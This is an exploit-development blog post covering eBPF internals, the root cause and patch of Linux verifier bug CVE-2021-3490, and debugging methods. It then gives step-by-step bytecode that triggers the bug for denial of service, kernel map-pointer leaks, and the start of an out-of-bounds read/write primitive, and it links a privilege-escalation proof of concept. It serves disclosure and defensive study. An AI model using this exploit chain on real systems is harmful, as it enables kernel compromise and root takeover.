Kernel Pwning with eBPF: a Love Story

Updated: 5 days ago

By: Valentina Palmiotti, @chompie1337

At Grapl we believe that in order to build the best defensive system we need to deeply understand attacker behaviors. As part of that goal we're investing in offensive security research. Keep up with our blog for new research on high risk vulnerabilities, exploitation, and advanced threat tactics.

Find the released local privilege escalation (LPE) Proof-of-Concept for CVE-2021-3490 here: https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490. It targets Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58. and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17.

This blog post is intended to give a detailed overview of eBPF from the perspective of an exploit developer. In this post, I cover:

The basics of how eBPF works
The internals of the eBPF verifier
A vulnerability (CVE-2021-3490) I exploit for local privilege escalation [13].
Debugging eBPF bytecode
Exploitation techniques for DoS, information leak, and LPE
Some interesting observations and other bugs I discovered
New mitigations that make the bug class more difficult to exploit
Weaknesses that are still present in eBPF today

I had no knowledge of eBPF going into this. My hope is that by sharing a PoC as well as my experience developing it, it can help others get started with eBPF exploitation.

eBPF: a Primer

Extended Berkeley Packet Filter: What is it?

Berkeley Packet Filter (BPF) was initially created as a way to perform packet filtering in the kernel. Its capabilities were later redesigned and extended to create extended Berkeley Packet Filter (eBPF) [1].

Put simply, eBPF provides a way for a user mode application to run code in the kernel without needing to write a kernel module.The purported benefits of using eBPF versus a kernel module are ease of use, stability, and security. There are also performance improvements gained by doing certain tasks directly in the kernel compared to a pure user mode program. eBPF programs are used to do a myriad of things such as: tracing, instrumentation, hooking system calls, debugging, and of course, packet capturing/filtering.

eBPF programs are written in a high level language and compiled into eBPF bytecode using a toolchain (such as BCC [18]). The eBPF VM uses a simple instruction set that uses eleven* 64-bit registers, a program counter, and a 512 byte fixed-size stack. Nine registers are general purpose read-write, one is a read-only stack pointer and the program counter is implicit [2]. The instruction set is similar to x86, and operates on both 64 and 32 bit values.

BPF_MOV64_IMM(BPF_REG_0, 0)
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4)
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10)
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4)
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1)
BPF_MOV32_IMM(BPF_REG_3, 0xFFFFFFFF)

Example of eBPF bytecode instructions

*Technically, it uses 12 registers, but the 12th register is an auxiliary register only used to perform ALU sanitation operations [12].

A user mode application loads the bytecode into the kernel using the bpf() [14] syscall, where the eBPF verifier will perform a number of checks to ensure the program is “safe” to run in the kernel. This verification step is critical - eBPF exposes a path for unprivileged users to execute in ring0.

After the program is loaded, the user mode application attaches the program to a “hook point”. A hook point is a place in the kernel where eBPF programs can be attached [5]. eBPF programs are event driven, meaning the program will execute when certain events occur at the hook point. The classic use case is attaching an eBPF program to a socket, where the program will execute when data is written to it.

If the kconfig knob CONFIG_BPF_JIT is set, the eBPF program is JIT compiled into native assembly instructions after it is verified and loaded. Otherwise, when the program is executed it is run in the eBPF interpreter which decodes and executes the eBPF bytecode instructions.

User mode applications can interact with and get data from the eBPF program running in the kernel using eBPF maps and eBPF helper functions, which are accessed via the bpf() syscall.

The sysctl knob kernel.unprivileged_bpf_disabled determines whether unprivileged users are allowed to run eBPF programs. If it is not set, unprivileged users are allowed to attach an eBPF program to a socket that the user owns. In many Linux distributions, such as Ubuntu, unprivileged_bpf_disabled is not enabled by default. Because of this, I decided to look into eBPF more closely, as allowing unprivileged users to run code in the kernel is a ripe attack surface.

eBPF Maps

I mentioned above that user mode processes can interact with a eBPF program in the kernel using eBPF maps. They can also be used by multiple eBPF programs to interact with each other. They are a generic key/value store with an arbitrary data structure [6]. There are various types of maps including: arrays, queues, and stacks.

A map is described by five different attributes:

type - the data structure of the map
key_size - the size in bytes of the key used to index an element (used in array maps)
value_size - the size in bytes of each element
max_entries - the maximum number of entries in the map
map_flags - describes special characteristics of the map, such as if the entire map memory should be preallocated or not.

eBPF maps can be created and altered from user space via the bpf() syscall using the BPF_MAP_CREATE command, updated using the BPF_MAP_UPDATE_ELEM command, and retrieve its contents using the BPF_MAP_LOOKUP_ELEM command. eBPF maps can accessed by eBPF programs using the file descriptor returned by BPF_MAP_CREATE and calling eBPF helper functions, which will return pointers to values within the map.

The eBPF Verifier

The exploit I wrote leverages a bug in the eBPF verifier. So before I delve into the vulnerability it is important to briefly explain the internals of the verifier.

The verifier starts by building a control flow graph of the program. Then, it will verify each instruction is valid and all memory accesses are safe through each possible flow of control [3]. Afterwards, it will add in runtime checks to the program. This process, called ALU Sanitation, inserts patches to the eBPF bytecode to ensure permitted memory ranges are not violated during runtime when performing pointer arithmetic [4].

The verifier tries to enforce these general set of rules:

No back edges, loops, or unreachable instructions.
No pointer comparisons can be performed, and only scalar values can be added or subtracted to a pointer. A scalar value in the eBPF verifier is any value that is not derived from a pointer. The verifier keeps track of which registers contain pointers and which contain scalar values.
Pointer arithmetic can not leave the “safe” bounds of a map. Meaning, the program can not access anything outside the predefined map memory. To do so, verifier keeps track of the upper and lower bounds of the values for each register.
No pointers can be stored in maps or stored as a return value, in order to avoid leaking kernel addresses to user space.

Range Tracking

The verifier stores the following bound values, for every register in each possible path of execution, to ensure there are no out-of-bound memory accesses:

umin_value , umax_value store the min/max value of the register when interpreted as an unsigned (64 bit) integer
smin_value , smax_value store the min/max value of the register when interpreted as a signed (64 bit) integer.
u32_min_value , u32min_value store the min/max value of the register when interpreted as an unsigned (32 bit) integer.
s32_min_value , s32_max_value store the min/max value of the register when interpreted as a signed (32 bit) integer.
var_off contains information about the bits of the the register that are known. It is stored in a structure called tnum which contains two 64 bit fields: mask and value . Every bit that is set in mask means the value of that bit is unknown. The unset bits are known, and their true value are stored in value . For example, if var_off = {mask = 0x0; value = 0x1} , all bits of the register are known, and the register is known to have a value of 1. If var_off = {mask = 0xFFFFFFFF00000000; value = 0x3} it means that the lower 32 bits of the register are known to be 0x00000003 and the upper 32 bits are unknown.

These bounds are used to update each other. In particular, if var_off indicates the register is a known constant, the min/max bounds are updated to reflect the known value. We will see why this is important later!

ALU Sanitation

ALU Sanitation is a feature that was introduced to supplement the static range tracking of the verifier. The idea is to prevent OOB memory accesses if the value of registers do not fall within their expected range during runtime. This was added to help mitigate potential vulnerabilities in the verifier and protect against speculative attacks.

For every arithmetic operation that involves a pointer and a scalar register, an alu_limit is calculated. This represents the maximum absolute value that can be added to or subtracted from the pointer [4]. Before each of these operations, the bytecode is patched with the following instructions:

*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg);

Note that off_reg represents the scalar register being added to the pointer register, and BPF_REG_AUX represents the auxiliary register.

The above instructions do the following:

The value of alu_limit is loaded into BPF_REG_AX .
The value of off_reg at runtime is subtracted from alu_limit and stored into BPF_REG_AX . If off_reg > alu_limit , the highest bit of BPF_REG_AX is set (the sign bit).
If the difference stored in BPF_REG_AUX is positive and off_reg is negative, indicating that alu_limit and the register’s value have opposing signs, the BPF_OR operation will set the sign bit.
The BPF_NEG operation will negate the sign bit. If the sign bit is set, it will become 0, and if not, it will become 1.
The BPF_ARSH operation does an arithmetic right shift of 63 bits. This fills BPF_REG_AX with either all 0s or 1s, the value of the sign bit.
Depending on the result of the above operation, the BPF_AND operation will either null out off_reg or leave it unchanged.

This means that if off_reg exceeds alu_limit , or if off_reg and alu_limit have opposing signs, the value of off_reg will be replaced with 0, nulling the pointer arithmetic operation.

alu_limit Computation:

The way alu_limit is calculated was recently updated [15]. The new implementation may not have been adopted yet by some Linux distributions. For completeness, I will cover both, and revisit why the differences matter as they become relevant in the next sections.

Previously:

The alu_limit is determined by the boundaries of the pointer register. Meaning, if the pointer register points to the beginning of a map, the alu_limit for subtraction is 0, and the alu_limit for addition is equal to the size of the map (minus 1). The alu_limit is updated with subsequent operations on the pointer register.

Now:

The alu_limit is determined by the boundaries of the offset register. Meaning if the value of the offset register at runtime is compared against the register’s boundaries computed during the verifier’s static range tracking.

My initial knowledge of the eBPF verifier came from this excellent blog post by Manfred Paul detailing his exploitation of CVE-2020-8835. I highly recommend checking it out!

The Vulnerability

We now have enough background to do a root cause analysis of CVE-2021-3490.

Recall that the eBPF instruction set can operate on both the entire 64 bits of registers or just the lower 32 bits. For this reason, the verifier range tracking contains separate bounds for the lower 32 bits of a register: {u,s}32_{min,max}_value .

These bounds are updated for every operation. Each operation has two tracking functions with a 64 bit and a 32 bit counter part. Both are called for a 64 bit operation in the function adjust_scalar_min_max_vals .

*
/* WARNING: This function does calculations on 64-bit values, but  * the actual execution may occur on 32-bit values. Therefore,      * things like bitshifts need extra checks in the 32-bit case.
*/
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
                                      struct bpf_insn *insn,
                                      struct bpf_reg_state 
                                                  *dst_reg,
                                      struct bpf_reg_state src_reg)
{
...
        case BPF_AND:
                dst_reg->var_off = tnum_and(dst_reg->var_off,       
                src_reg.var_off);
                scalar32_min_max_and(dst_reg, &src_reg);
                scalar_min_max_and(dst_reg, &src_reg);
                break;
        case BPF_OR:
                dst_reg->var_off = tnum_or(dst_reg->var_off,  
                src_reg.var_off);
                scalar32_min_max_or(dst_reg, &src_reg);
                scalar_min_max_or(dst_reg, &src_reg);
                break;
        case BPF_XOR:
                dst_reg->var_off = tnum_xor(dst_reg->var_off,   
                src_reg.var_off);
                scalar32_min_max_xor(dst_reg, &src_reg);
                scalar_min_max_xor(dst_reg, &src_reg);
                break;
                
...
}

The bug, CVE-2021-3490, is found in the 32 bit tracking function for BPF_AND , BPF_OR , and BPF_XOR operations. It is the same in each of the functions.

Let’s take a look at an excerpt of the offending code for BPF_AND :

static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
                                 struct bpf_reg_state *src_reg)
{
    bool src_known = tnum_subreg_is_const(src_reg->var_off);
    bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
    struct tnum var32_off = tnum_subreg(dst_reg->var_off);
    s32 smin_val = src_reg->s32_min_value;
    u32 umax_val = src_reg->u32_max_value;


    /* Assuming scalar64_min_max_and will be called so its safe
    * to skip updating register for known 32-bit case.
    */
    if (src_known && dst_known)
        return;
...
}

As shown in the code snippet above, if the lower 32 bits of both the source and destination register are known, the function skips updating the 32 bit bounds.

The comment above the return states that this is OK, because the 64 bit counterpart will take care of it. Let’s take a look:

static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
                              struct bpf_reg_state *src_reg)
{
    bool src_known = tnum_is_const(src_reg->var_off);
    bool dst_known = tnum_is_const(dst_reg->var_off);
    s64 smin_val = src_reg->smin_value;
    u64 umin_val = src_reg->umin_value;

    if (src_known && dst_known) {
            __mark_reg_known(dst_reg, dst_reg->var_off.value);
            return;
    }
  ...
}

Indeed, we can see if src_known and dst_known are true, the function __mark_reg_known will be called. Can you spot the problem?

In scalar32_min_max_and , the _known variable is calculated using tnum_subreg_is_const . The 64 bit counterpart, scalar_min_max_and , uses tnum_is_const . The difference is that the former returns true if the the lower 32 bits of the register are known constants, and the latter returns true only if the entire 64 bits are constant. If the operation involves registers where the lower 32 bits are known but the upper 32 bits are unknown, the assumption stated in the comment is violated.

In the function adjust_scalar_min_max_vals , before returning, the bounds of the destination register are updated a last time by calling the following three functions:

__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
return 0;

Each of these functions have 32 and 64 bit counterparts. I’ll just cover the 32 bit case, since that is what the bug affects.

First, the registers bounds are updated using the current bounds and var_off .

static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
    struct tnum var32_off = tnum_subreg(reg->var_off);

    /* min signed is max(sign bit) | min(other bits) */
    reg->s32_min_value = max_t(s32, reg->s32_min_value,
                               var32_off.value | (var32_off.mask & 
                               S32_MIN));
        
     /* max signed is min(sign bit) | max(other bits) */
     reg->s32_max_value = min_t(s32, reg->s32_max_value,
                                var32_off.value | (var32_off.mask & 
                                S32_MAX));
     reg->u32_min_value = max_t(u32, reg->u32_min_value,
                               (u32)var32_off.value);
     reg->u32_max_value = min(reg->u32_max_value,
                             (u32)(var32_off.value |
                              var32_off.mask));
}

Notice that the min bounds set to either the current min or the known value of register, whichever is larger. Similarly, the max bounds are set either the current max, or the known value of the register, whichever is smaller.

Then, the signed and unsigned bounds are used to update each other in __reg32_deduce_bounds .

/* Uses signed min/max values to inform unsigned, and vice-versa */

static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
    /* Learn sign from signed bounds.
     * If we cannot cross the sign boundary, then signed and
     * unsigned bounds
     * are the same, so combine.  This works even in the
     * negative case, e.g.
     * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
     */
    if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) {
            reg->s32_min_value = reg->u32_min_value =
                        max_t(u32, reg->s32_min_value, 
                        reg->u32_min_value);
                reg->s32_max_value = reg->u32_max_value =
                        min_t(u32, reg->s32_max_value, 
                        reg->u32_max_value);
                return;
    }
...
}

Finally, the unsigned bounds are used to update var_off in __reg_bound_offset .

static void __reg_bound_offset(struct bpf_reg_state *reg)
{
    struct tnum var64_off = tnum_intersect(reg->var_off,
                            tnum_range(reg->umin_value,
                                       reg->umax_value));                
    struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),tnum_range(reg->u32_min_value, reg->u32_max_value));

    reg->var_off = tnum_or(tnum_clear_subreg(var64_off), 
                                             var32_off);
}

Here,

tnum_range returns a tnum representing the possible values given a range of unsigned integers.
tnum_intersect takes two tnum s and combines the knowledge conveyed by both into a single tnum .

Let’s go through the steps using an example so we can understand why this is a critical vulnerability.

Suppose we have the instruction BPF_ALU64_REG(BPF_AND, R2, R3). This instruction performs an AND operation on registers R2 and R3 and saves the results in R2.

R2 has var_off = {mask = 0xFFFFFFFF00000000; value = 0x1}, meaning the lower 32 bits are known to have a value of 1, and the upper 32 bits are unknown. Because the lower 32 bits of the register are known, its 32bit bounds are equal to the value.
R3 has var_off = {mask = 0x0; value = 0x100000002}, meaning the entire 64 bits are known and equal to 0x100000002.

The steps to update the 32 bit bounds of R2 are as follows:

As shown on line 12 of the snippet of adjust_scalar_min_max_vals, the function tnum_and is called. This will perform an AND operation and save the results in var_off of the destination register, R2. Recall, the lower 32 bits in both of the registers are known. All of the bits of R3 are known: the upper 31 bits of are 0, and the 32nd bit is 1. This means that R2 is left with var_off = {mask = 0x100000000; value = 0x0} . This is because 2 & 1 = 0 (for the lower 32 bits), and all but the 32nd bit will be known to be 0, since R3 has a 1 in the 32nd bit.
On the next line, scalar32_min_max_and is called. We already know that this function will return immediately and make no changes to the bounds, because the lower 32 bits of both registers are known.
Then __update_reg32_bounds is called. This will set u32_max_value = 0 , because the value of var_off.value = 0 < u32_max_value = 1 . Similarly, it will set u32_min_value = 1 because var_off.value = 0 < u32_min_value . The same goes for the signed bounds.
The functions __reg32_deduce_bounds and __reg_bound_offset will not make any changes to the bounds.

Now we can see that in this case, we are left with a register where {u,s}32_max_value = 0 < {u,s}32_min_value = 1 !

Now, let’s look at the patch.

@@ -7084,11 +7084,10 @@ static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
         s32 smin_val = src_reg->s32_min_value;
         u32 umax_val = src_reg->u32_max_value;
 
-        /* Assuming scalar64_min_max_and will be called so its safe
-         * to skip updating register for known 32-bit case.
-         */
-        if (src_known && dst_known)
+        if (src_known && dst_known) {
+                __mark_reg32_known(dst_reg, var32_off.value);
                 return;
+        }

Above we can see that now, __mark_reg32_known is called on the destination register before returning if the lower 32 bits of the source and destination register are known constants.

Why does this matter? Let’s take a look at what __mark_reg32_known does:

/* Mark the unknown part of a register (variable offset or scalar  * value) as known to have the value @imm.
*/
static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{
    reg->var_off = tnum_const_subreg(reg->var_off, imm);
    reg->s32_min_value = (s32)imm;
    reg->s32_max_value = (s32)imm;
    reg->u32_min_value = (u32)imm;
    reg->u32_max_value = (u32)imm;
}

The function above sets all the of the 32 bit boundaries to the value of the register’s lower 32 bits, which are known to be constant. The correct bounds will be conserved when the final boundary updating functions are called, fixing the bug.

Debugging eBPF Programs

Before getting into exploitation, I’ll briefly cover a couple of ways to debug eBPF programs when writing exploits. I specifically say “when writing exploits”, because there are many tools available to help write and debug eBPF programs for legitimate uses, via emulation. One such tool is rbpf [10], which is a Rust user space virtual machine for eBPF. However, because I exploited a bug in the eBPF verifier, it was important to be able to debug it directly in the kernel to replicate the exact behavior. Additionally, I wrote the bytecode by hand (as opposed to using a toolchain to compile a program into bytecode) so it made using these tools less practical.

Verifier Log Output

When loading an eBPF program, you have the option to specify a log level and a buffer to receive log output from the verifier.

char verifier_log_buff[0x200000] = {0};

union bpf_attr prog_attrs =
{
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = cnt,
    .insns = (uint64_t)insn,
    .license = (uint64_t)"",
    .log_level = 2,
    .log_size = sizeof(verifier_log_buff),
    .log_buf = verifier_log_buff
};

This is useful for debugging loading failure when the verifier rejects the program.

34: (bf) r6 = r3
35: R0_w=invP0 R2_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R3_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R4_w=invP0 R5_w=invP4294967298 R6_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R7_w=invP(id=0) R10=fp0 fp-8=mmmm????
35: (7b) *(u64 *)(r2 +8) = r6
R6 leaks addr into map

Example verifier log output

Keep in mind that if you choose to provide a log output buffer, it should be large enough to receive the entire output. If it is not large enough, loading the program will fail. This will occur even if the program is valid and passes the verifier checks. This can occur if you are loading a long program, as the verifier prints output for every instruction on each path it traverses. I ran into this issue while writing my exploit, so I thought it was worth noting.

Runtime Debugging

Verifier log output provides a lot of useful info, particularly when playing with a verifier vulnerability. Being brand new to eBPF, I wanted to get familiar with the eBPF instruction set. I also wanted to be able to look at the values of registers during program runtime, like in a debugger such as gdb or Windbg.

I found that there isn’t really a straightforward way to do this, but I did find a solution.

As previously mentioned, eBPF programs are either JIT compiled after verification and ran natively or decoded and executed within the eBPF interpreter. This depends on the kernel configuration CONFIG_BPF_JIT .

If JIT is disabled, eBPF bytecode is decoded and executed in kernel/bpf/core.c in the function ___bpf_prog_run :

/**
 *    __bpf_prog_run - run eBPF program on a given context
 *    @regs: is the array of MAX_BPF_EXT_REG eBPF pseudo registers
 *    @insn: is the array of eBPF instructions
 *
 * Decode and execute eBPF instructions.
 */
 
static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
{
...
 select_insn:
        goto *jumptable[insn->code];
...
}

To get the value of a register during each instruction of the program, you can simply insert a printk statement before each instruction is executed. An example is shown below:

static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
{
...
    int lol = 0;
   
   // Check the first instruction to match the first instruction of  
   // the target eBPF program to debug, so output isn't printed for  
   // every eBPF program that is ran.
    if(insn->code == 0xb7)
    {
        lol = 1;
    }


select_insn:
        if(lol)
        {
            printk("instruction is: %0x\n", insn->code);
            printk("r0: %llx, r1: %llx, r2: %llx\n", regs[0], 
            regs[1], regs[2]);
            ...
        }
        goto *jumptable[insn->code];
...
}

You will need to compile the kernel yourself with CONFIG_BPF_JIT disabled. For a quick startup on how to compile a kernel yourself and run it with qemu , check out syzkaller’s guide [11].

This helped me learn the instruction set, and figure out the calling convention for calling eBPF helper functions. It also helped me identify some new mitigations introduced into ALU Sanitation that I will cover later.

Exploitation

Triggering the Vulnerability

The specifics of the bug were covered in the Vulnerability section. Here, I will go through the bytecode triggers the bug.

Remember, we need two registers with tnum s in the same state as shown in the example. That is, one register with var_off = {mask = 0xFFFFFFFF00000000; value = 0x1} and one with var_off = {mask = 0x0; value = 0x100000002} .

The latter is easy. Since all the bits are known, we can load the register with the constant value. We will store this value in arbitrary register referred to as CONST_REG . Due to the instruction op size, we are restricted to working with 32 bit values. We create the 64 bit value (0x100000002) across a few instructions:

// Load 1 into the register
BPF_MOV64_IMM(CONST_REG, 0x1)
// Left shift 32 bits, the value is now 0x100000000
BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32)
// Add 2, the value is now 0x100000002
BPF_ALU64_IMM(BPF_ADD, CONST_REG, 2)

Now, for the other register: we need to have the upper 32 bits of mask set. We can start with a value that is unknown to the verifier, meaning that all the bits of mask are set. The most straightforward way to do this is to load a value from a eBPF map. This way, we can also control the actual value at runtime, which will become useful later. First, we need to retrieve a pointer an eBPF map we create prior to loading the program, which has file descriptor store_map_fd .

// Load a pointer to the store_map_fd map into R1. 
BPF_LD_MAP_FD(BPF_REG_1, store_map_fd)
BPF_MOV64_REG(BPF_REG_2, BPF_STACK_REG)
// Load 0 into R0
BPF_MOV64_IMM(BPF_REG_0, 0)
// Store value of R0=0 at stack_ptr-4.
BPF_STX_MEM(BPF_W, BPF_STACK_REG, BPF_REG_0, -4)
// Set R2= stack_ptr-4
BPF_MOV64_REG(BPF_REG_2, BPF_STACK_REG)
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4)
// Call helper function map_lookup_elem. First parameter is in R1 // (map pointer). Second parameter is in R2, (ptr to elem index   // value).  *(word*)(stack_ptr-4) = 0
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem)

Now a pointer to the first element in our map will be returned in register R0 . From there we can read from it and load a value into an arbitrary register I will refer to as EXPLOIT_REG . That will be our second bug-triggering register.

// Read 8 bytes from returned map element pointer and store it in // EXPLOIT_REG.
BPF_LDX_MEM(BPF_DW,EXPLOIT_REG, BPF_REG_R0, 0)

Since user space has full control over what is stored in an eBPF map, the verifier will mark this register as having a completely unknown value. That is, var_off = {mask = 0xFFFFFFFFFFFFFFFF; value = 0x0} . Now, we just have to set the lower 32 bits as known with value 1.

// Set R2 to be 0xFFFFFFFF
BPF_MOV64_IMM(BPF_REG_2, 0xFFFFFFFF)
// Left shift R2 32 bits, so the value is now 0xFFFFFFFF00000000
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32)
// AND EXPLOIT_REG and R2 and store the results in EXPLOIT_REG
// The upper 32 bits will remain unknown, but the 32 bits are known // to be zero
BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, BPF_REG_2)
// Add 1 to EXPLOIT_REG, it now has mask = 0xFFFFFFFF00000000 and // value = 0x1
BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1)

Now we trigger the vulnerability by performing an AND operation on the two registers we set up.

// Trigger the bug, EXPLOIT_REG now has u32_min_value=1,           // u32_max_value=0
BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG)

The actual value we store in the map, and thus the value of EXPLOIT_REG , will be set to 0. We’ll use that later on.

Denial of Service (DoS)

We now have a register EXPLOIT_REG , with invalid 32 bit bounds u32_min_value=1 and u32_max_value=0 .

My first attempt at exploitation wasn’t useful for LPE but it did result in an easy DoS exploit. I learned a bit more about how the verifier patches bytecode in the process.

Recall that the verifier checks all possible execution paths. This can be computationally costly, so optimizations are performed to reduce the number of paths it needs to traverse. One is using the bounds of a register to determine the outcome of a conditional statement.

For example:

BPF_JMP32_IMM(BPF_JGE, EXPLOIT_REG, 1, 5)

The above instruction will jump five instructions if the value of the lower 32 bits of EXPLOIT_REG is greater than or equal to 1.

For a JGE 32 bit conditional, the verifier will attempt to determine if only one branch is taken by checking the u32_min_value of the register:

static int is_branch32_taken(struct bpf_reg_state *reg, u32 val, u8 opcode)
{
        struct tnum subreg = tnum_subreg(reg->var_off);
        s32 sval = (s32)val;


        switch (opcode) {
...
        case BPF_JGE:
                if (reg->u32_min_value >= val)
                       return 1;
                else if (reg->u32_max_value < val)
                        return 0;
..
}

Notice that is_branch32_taken will return true if u32_min_value >= 1 . Because EXPLOIT_REG has the invalid bound u32_min_value = 1 , it returns TRUE . This means that the verifier believes the TRUE branch will always be taken, and will not check the FALSE branch. In reality, EXPLOIT_REG will have a value of 0 at runtime, so it will take the FALSE branch. This means that we can put any instructions we’d like in the FALSE branch and the verifier won’t check them for safety!

At this point, I thought that I would be able to insert the rest of my exploit into this branch and have free rein. However, the verifier patches all instructions in “dead” branches.

/* The verifier does more data flow analysis than llvm and will not
 * explore branches that are dead at run time. Malicious programs  
 * can have dead code too. Therefore replace all dead at-run-time  
 * code with 'ja -1'.
 *
 * Just nops are not optimal, e.g. if they would sit at the end of 
 * the program and through another bug we would manage to jump     
 * there, then we'd execute beyond program memory otherwise.   
 * Returning exception code also wouldn't work since we can have   
 * subprogs where the dead code could be located.
 */
static void sanitize_dead_code(struct bpf_verifier_env *env)
{
    struct bpf_insn_aux_data *aux_data = env->insn_aux_data;
    struct bpf_insn trap = BPF_JMP_IMM(BPF_JA, 0, 0, -1);
    struct bpf_insn *insn = env->prog->insnsi;
    const int insn_cnt = env->prog->len;
    int i;
    
    for (i = 0; i < insn_cnt; i++) {
            if (aux_data[i].seen)
                   continue;
            memcpy(insn + i, &trap, sizeof(trap));
    }
}

Above, the function sanitize_dead_code , is where this patching occurs. Interestingly, it patches all the dead instructions with a jmp - 1 instruction. Meaning that once it hits the dead code path, it will go backwards one instruction, execute the conditional statement, then again to the jump back one instruction, in a never ending loop.

This leads to the kernel thread idling forever. You can run a few instances of the exploit, lock up all available kernel threads, and cause a DoS.

Map Pointer Leak

My second instinct was to use the register with invalid boundaries to widen the “safe” range for pointer arithmetic.

As previously mentioned, the verifier keeps track of which registers contain pointers and which contain scalars. While I was looking at the code I came across an interesting snippet:

/* Handles arithmetic on a pointer and a scalar: computes new      
 * min/max and var_off.
 * Caller should also handle BPF_MOV case separately.
 * If we return -EACCES, caller may want to try again treating     
 * pointer as a scalar.  So we only emit a diagnostic if           
 * !env->allow_ptr_leaks.
 */
static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
                                struct bpf_insn *insn,
                                const struct bpf_reg_state 
                                             *ptr_reg,
                                const struct bpf_reg_state 
                                             *off_reg)
{
...
    bool known = tnum_is_const(off_reg->var_off);
    s64 smin_val = off_reg->smin_value;
    smax_val = off_reg -> smax_value;
    smin_ptr = ptr_reg->smin_value;
    smax_ptr = ptr_reg-> smax_value;
    u64 umin_val = off_reg->umin_value;
    umax_val = off_reg-> umax_value;
    umin_ptr = ptr_reg->umin_value;
    umax_ptr = ptr_reg-> umax_value;
...
    if ((known && (smin_val != smax_val || umin_val != umax_val)) || smin_val > smax_val || umin_val > umax_val) {
        /* Taint dst register if offset had invalid bounds derived             
        *  from e.g. dead branches.
        */
            __mark_reg_unknown(env, dst_reg);
            return 0;
    }
...
}

The function adjust_ptr_min_max_vals shown above is called for arithmetic instructions involving a pointer. The register off_reg represents the offset scalar register being added to a pointer register. Notice that if the offset register has bounds such that umin_value > umax_value , the function __mark_reg_unknown is called on the destination register. This function marks the register as containing an unknown scalar value.

This means that if we have a register EXPLOIT_REG with bounds umin_value > umax_value and add it to a destination pointer register, the pointer register will be changed to a scalar. So, the verifier will no longer think that the register contains a pointer! This is notable because the verifier will now allow us to leak its value to user space by storing it in a eBPF map.

First, we need to extend the invalid 32 bit bounds u32_min_value, u32_max_value to their 64 bit counterparts umin_value, umax_value .

// Zero extend the lower 32 bits of EXPLOIT_REG
BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG)

Next, do any arithmetic operation with a map pointer stored in OOB_MAP_REG with EXPLOIT_REG . Store its value in STORE_MAP_REG, which contains a pointer to another eBPF map that can be accessed from user space.

BPF_ALU64_REG(BPF_ADD, OOB_MAP_REG, EXPLOIT_REG)
BPF_STX_MEM(BPF_DW, STORE_MAP_REG, OOB_MAP_REG, 0)

We have now leaked the kernel address of an eBPF map, which we will use later on in the exploit!

Note: this can also be done once we have established kernel read/write primitives. This is done by accessing the private_data structure of the file from the fd table, which we can get once we have the address of the thread’s task_struct . However, this requires many more dependencies on hardcoded kernel offsets. I like to avoid this whenever possible, as it makes exploits more annoying to maintain. I thought this shortcut was a nice improvement.

Verifier Range Tracking Primitive

Now, we create a primitive that will allow us to make out of bound read/writes. This will give us arbitrary read/write in the kernel. The idea is that we can create a register that the verifier believes has a value of 0, but really has a value of 1 during runtime.

First, trigger the bug, where we have EXPLOIT_REG with invalid 32 bit bounds u32_max_value = 0 < u32_min_value = 1 .

Next, add 1 to EXPLOIT_REG .

BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1)

In the case of immediate instructions, the immediate value is simply added to all the bounds, if adding the value will not cause an overflow. Thus, after adding 1 to EXPLOIT_REG , we have u32_max_value = 1 and u32_min_value = 2 , with var_off = {0x100000000; value = 0x1} .

Now we need a register with an initially unknown value. Let’s call this register UNKNOWN_VALUE_REG . We create the register the same way as before, by loading a value from a eBPF map. The real runtime value of the register will be 0. Then, we start to manipulate the bounds of the register by adding a conditional jmp statement:

BPF_JMP32_IMM(BPF_JLE, UNKOWN_VALUE_REG, 1, 1)
BPF_EXIT_INSN()

The above conditional jmp32 instruction will skip the exit instruction if the value of the lower 32 bits of the register is less than or equal to 1. Because the actual value of the register will be 0, the conditional statement will evaluate to TRUE and the exit instruction will be skipped. However, because the verifier does not know what the value will be, the 32 bit bounds of the register in the TRUE branch will be set to: u32_min_value = 0 and u32_max_value = 1. Remember, the jmp was conditional on the lower 32 bits, so the upper 32 bits are still unknown. The lowest bit is also unknown, since it can be either 0 or 1. So this register has var_off = {mask = 0xFFFFFFFF00000001; value = 0x0} .

